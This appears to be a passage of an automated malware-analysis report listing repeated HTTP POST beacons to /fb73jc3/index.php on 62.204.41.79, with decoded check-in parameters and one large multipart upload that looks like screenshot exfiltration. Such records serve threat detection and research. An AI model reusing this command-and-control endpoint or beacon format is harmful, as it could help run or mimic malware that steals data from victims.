                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----MTA1OTc2Host: 62.204.41.79Content-Length: 106128Cache-Control: no-cache
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
